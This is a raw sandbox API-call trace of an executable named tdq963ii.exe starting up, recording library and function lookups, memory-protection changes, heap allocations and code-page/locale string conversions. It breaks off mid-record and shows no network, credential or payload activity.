GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0241.948] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0241.948] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0241.949] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0241.949] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0241.949] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0241.949] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0241.950] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0241.950] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0241.951] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0241.951] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0241.951] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0241.951] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0241.952] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0241.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x45fc5180, dwHighDateTime=0x1d68287)) [0241.952] GetCurrentThreadId () returned 0x78c [0241.952] GetCurrentProcessId () returned 0x30c [0241.952] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36229083844) returned 1 [0241.952] GetProcessHeap () returned 0x650000 [0241.952] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0241.952] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0241.952] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0241.953] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0241.954] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0241.954] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0242.204] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0242.204] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0242.205] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0242.206] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0242.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3bc) returned 0x6670a0 [0242.207] GetCurrentThreadId () returned 0x78c [0242.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x667468 [0242.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x667488 [0242.208] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x2b4125f7, hStdError=0x0)) [0242.208] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0242.208] GetFileType (hFile=0x3) returned 0x2 [0242.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0242.208] GetFileType (hFile=0x7) returned 0x2 [0242.209] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0242.209] GetFileType (hFile=0xb) returned 0x2 [0242.209] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0242.209] GetEnvironmentStringsW () returned 0x667c90* [0242.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb86) returned 0x668820 [0242.210] FreeEnvironmentStringsW (penv=0x667c90) returned 1 [0242.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x94) returned 0x667c90 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa0) returned 0x667d30 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3e) returned 0x664dd0 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6c) returned 0x667dd8 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6e) returned 0x667e50 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x78) returned 0x65f900 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x62) returned 0x667ec8 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x667f38 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x667f70 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x667fc0 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x28) returned 0x667ff8 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x666a70 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a) returned 0x668028 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x65f980 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x668080 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x6680b8 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c) returned 0x666a98 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd2) returned 0x6680f0 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x6681d0 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x668258 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3a) returned 0x664e18 [0242.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x90) returned 0x668298 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x668330 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x668360 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x668398 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x6683d8 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x668428 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x664e60 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x668488 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x82) returned 0x6684a8 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x668538 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1e) returned 0x666ac0 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2c) returned 0x668570 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6685a8 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x668608 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x668668 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x664ea8 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6686a0 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x668700 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x668730 [0242.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x8c) returned 0x668768 [0242.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668820 | out: hHeap=0x650000) returned 1 [0242.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x668800 [0242.212] GetLastError () returned 0x0 [0242.212] SetLastError (dwErrCode=0x0) [0242.212] GetLastError () returned 0x0 [0242.212] SetLastError (dwErrCode=0x0) [0242.212] GetLastError () returned 0x0 [0242.212] SetLastError (dwErrCode=0x0) [0242.212] GetACP () returned 0x4e4 [0242.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x669008 [0242.212] GetLastError () returned 0x0 [0242.212] SetLastError (dwErrCode=0x0) [0242.212] IsValidCodePage (CodePage=0x4e4) returned 1 [0242.212] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0242.212] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0242.212] GetLastError () returned 0x0 [0242.213] SetLastError (dwErrCode=0x0) [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0242.213] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0242.213] GetLastError () returned 0x0 [0242.213] SetLastError (dwErrCode=0x0) [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0242.213] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0242.213] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0242.213] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿg$A+äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0242.213] GetLastError () returned 0x0 [0242.213] SetLastError (dwErrCode=0x0) [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0242.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0242.213] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0242.213] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0242.213] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 